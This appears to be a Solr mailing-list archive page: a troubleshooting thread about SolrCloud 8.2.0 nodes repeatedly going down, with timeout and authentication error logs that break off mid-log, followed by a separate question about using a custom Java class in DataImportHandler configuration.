Today I tried to dump the heap and threads. I could only dump the threads; the
heap could not be dumped because the Solr instance was hung. Almost all threads
were blocked.

On Tuesday, June 23, 2020, 10:42:36 PM GMT+7, Tran Van Hoan 
 wrote:  
 
I checked the node exporter metrics and saw no network problems.

On Tuesday, June 23, 2020, 8:37:41 PM GMT+7, Tran Van Hoan 
 wrote:  
 
I checked the node exporter; no problems with OS, hardware, or network. I
attached images of the Solr metrics for 7 days and 12h.

On Tuesday, June 23, 2020, 2:23:05 PM GMT+7, Dario Rigolin 
 wrote:  
 
 What about a network issue?

Il giorno mar 23 giu 2020 alle ore 01:37 Tran Van Hoan
 ha scritto:

>
> dear all,
>
> I have a SolrCloud 8.2.0 with 6 instances on 6 servers (64G RAM), and each
> instance has Xmx = Xms = 30G.
>
> Today almost all nodes in the SolrCloud died 2 times, from 8:00AM (5/6
> nodes were down) and 1:00PM (2/6 nodes were down). Yesterday, one node
> was down. Almost no metrics increased much, except threads.
>
> Performance in one week ago:
>
> performace 12h ago:
>
> I go to the admin UI, some node dead some node too long to response. When
> checking logfile, they generate too much (log level warning), here are logs
> which appears in the solr cloud:
>
> Log before server 4 and 6 down
>
> - Server 4 before it dead:
>
>    + o.a.s.h.RequestHandlerBase java.io.IOException:
> java.util.concurrent.TimeoutException: Idle timeout expired: 12/12
> ms
>
>  +org.apache.solr.client.solrj.SolrServerException: Timeout occured while
> waiting response from server at:
> http://server6:8983/solr/mycollection_shard3_replica_n5/select
>
>
>
> at
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:406)
>
>                at
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:746)
>
>                at
> org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1274)
>
>                at
> org.apache.solr.handler.component.HttpShardHandler.request(HttpShardHandler.java:238)
>
>                at
> org.apache.solr.handler.component.HttpShardHandler.lambda$submit$0(HttpShardHandler.java:199)
>
>                at java.util.concurrent.FutureTask.run(FutureTask.java:266)
>
>                at
> java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)
>
>                at java.util.concurrent.FutureTask.run(FutureTask.java:266)
>
>                at
> com.codahale.metrics.InstrumentedExecutorService$InstrumentedRunnable.run(InstrumentedExecutorService.java:181)
>
>                at
> org.apache.solr.common.util.ExecutorUtil$MDCAwareThreadPoolExecutor.lambda$execute$0(ExecutorUtil.java:209)
>
>                at
> java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
>
>                at
> java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
>
>                ... 1 more
>
> Caused by: java.util.concurrent.TimeoutException
>
>                at
> org.eclipse.jetty.client.util.InputStreamResponseListener.get(InputStreamResponseListener.java:216)
>
>                at
> org.apache.solr.client.solrj.impl.Http2SolrClient.request(Http2SolrClient.java:397)
>
>                ... 12 more
>
>
>
> + o.a.s.s.HttpSolrCall invalid return code: -1
>
> + o.a.s.s.PKIAuthenticationPlugin Invalid key request timestamp:
> 1592803662746 , received timestamp: 1592803796152 , TTL: 12
>
> + o.a.s.s.PKIAuthenticationPlugin Decryption failed , key must be wrong =>
> java.security.InvalidKeyException: No installed provider supports this key:
> (null)
>
> +  o.a.s.u.ErrorReportingConcurrentUpdateSolrClient Error when calling
> SolrCmdDistributor$Req: cmd=delete{,commitWithin=-1}; node=ForwardNode:
> http://server6:8983/solr/mycollection_shard3_replica_n5/ to
> http://server6:8983/solr/mycollection_shard3_replica_n5/ =>
> java.util.concurrent.TimeoutException
>
> + o.a.s.s.HttpSolrCall
> null:org.apache.solr.update.processor.DistributedUpdateProcessor$DistributedUpdatesAsyncException:
> Async exception during distributed update: null
>
>
>
> Server 2:
>
>  + Max requests queued per destination 3000 exceeded for
> HttpDestination[http://server4:8983
> ]@7d7ec93c,queue=3000,pool=MultiplexConnectionPool@73b938e3
> [c=4/4,b=4,m=0,i=0]
>
>  +  Max requests queued per destination 3000 exceeded for

SolrCloud with custom package in dataimport

2020-06-26 Thread stefan
Hey,

Is it possible to reference a custom java class during the dataimport? The 
dataimport looks something like this:

```






db-data-config.xml


```
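
For reference, a hedged sketch of what a DataImportHandler registration and a
data-config referencing a custom class could look like; the class name
com.example.MyTransformer and the JDBC details are placeholders, and whether a
class shipped as a Solr package can be loaded this way is exactly the open
question here:

```
<!-- solrconfig.xml: register the DIH request handler -->
<requestHandler name="/dataimport"
                class="org.apache.solr.handler.dataimport.DataImportHandler">
  <lst name="defaults">
    <str name="config">db-data-config.xml</str>
  </lst>
</requestHandler>

<!-- db-data-config.xml: reference a custom transformer class -->
<dataConfig>
  <!-- driver/url/credentials are placeholders -->
  <dataSource type="JdbcDataSource" driver="org.postgresql.Driver"
              url="jdbc:postgresql://localhost/db" user="solr" password="secret"/>
  <document>
    <entity name="item" query="SELECT id, name FROM item"
            transformer="com.example.MyTransformer"/>
  </document>
</dataConfig>
```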

Sadly I was unable to find any information on this topic.

Thanks for your help!

